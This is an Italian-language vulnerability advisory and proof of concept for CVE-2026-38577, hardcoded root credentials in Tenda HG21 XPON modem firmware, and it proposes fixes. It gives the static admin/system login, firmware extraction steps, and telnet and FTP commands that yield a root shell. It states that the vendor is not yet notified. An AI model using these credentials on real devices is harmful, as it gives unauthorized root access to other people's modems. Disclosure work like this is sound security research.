
Proof-of-concept che dimostra credenziali root hardcoded (admin/system) nel firmware del modem XPON Tenda HG21, consentendo accesso root non autorizzato tramite telnet e FTP.
| Campo | Valore |
|---|---|
| ID CVE | CVE-2026-38577 |
| Vendor | Tenda |
| Prodotto | Tenda HG21 (Modem Fiber XPON) |
| Versione Affetta | V4.0.0-260302 |
| Product Key | HG21-V1.0-TDE01 |
| Versione Hardware | V1.0 |
| Data Build Firmware | 2026-03-02 |
| File Firmware | US_HG21re_300002982_en_xpon_2.zip |
| Classe di Vulnerabilità | CWE-798: Uso di Credenziali Hardcoded |
| Scopritore | Anmol Singh Rajput — Ricercatore di Sicurezza Indipendente |
| Stato della Divulgazione | Vendor non ancora informato al momento della riserva CVE — si applica una finestra di divulgazione responsabile di 90 giorni dalla data di assegnazione del CVE |
L'analisi del firmware del modem fiber XPON Tenda HG21 ha rivelato un account amministrativo hardcoded integrato nell'immagine firmware fornita. All'account vengono concessi pieni privilegi di root (UID 0) e le sue credenziali sono statiche su tutti i dispositivi, il che significa che qualsiasi attaccante in grado di raggiungere un servizio di gestione esposto su un'unità vulnerabile può autenticarsi come root senza dover conoscere la password dell'interfaccia web impostata dal cliente.
/etc/passwd nel firmware estratto include una voce admin con un
hash della password SHA256crypt che corrisponde al valore statico system.0 — cioè è root, non un account di servizio
limitato./etc/shadow, quindi l'hash debole/statico in
passwd è l'unica barriera che protegge l'account./etc/inetd.conf avvia telnetd e ftpd, entrambi eseguiti come root,
quindi l'account hardcoded è raggiungibile tramite rete, non solo su una
console seriale/UART.Un attaccante con accesso di rete ai servizi telnet (TCP/23)
o FTP (TCP/21) di un dispositivo vulnerabile può accedere come admin
utilizzando la password statica e ottenere una shell root / accesso ai
file a livello root. Ciò consente, come minimo:
Vettori CVSS dalla segnalazione originale (il punteggio del vendor potrebbe differire una volta pubblicato):
Questo è un PoC basato su credenziali — dimostra che l'account hardcoded autentica e concede root, non uno sfruttamento di corruzione della memoria. Eseguilo solo contro un dispositivo di tua proprietà o per il quale sei esplicitamente autorizzato a testare.
# Estrai il firmware (binwalk o lo strumento del vendor che preferisci)
binwalk -e US_HG21re_300002982_en_xpon_2.bin
# Individua e ispeziona il file passwd
find . -name passwd
cat squashfs-root/etc/passwd
# -> admin:<sha256crypt-hash-di-"system">:0:0:root:/root:/bin/sh
nmap -p 21,23 <ip-target>
telnet <ip-target>
# login: admin
# password: system
ftp <ip-target>
# Nome: admin
# Password: system
Un accesso riuscito su entrambi i servizi restituisce una shell/sessione
FTP con privilegi root (id riporterà uid=0(root)).
admin/system, o come minimo imporre una password casuale unica per
dispositivo impostata al primo avvio (non derivabile dal solo numero di serie).telnetd/ftpd per impostazione predefinita; richiedere
un'adesione esplicita e un canale autenticato e crittografato (SSH/SFTP)
per l'amministrazione remota.| Data | Evento |
|---|---|
| 2026-03-02 | Rilascio del build firmware vulnerabile |
| — | Scoperta durante un'analisi firmware indipendente |
| 2026-04-09 | CVE-2026-38577 riservato tramite MITRE |
| — | Notifica al vendor in sospeso (finestra di divulgazione di 90 giorni dall'assegnazione del CVE) |
Scoperto e segnalato da: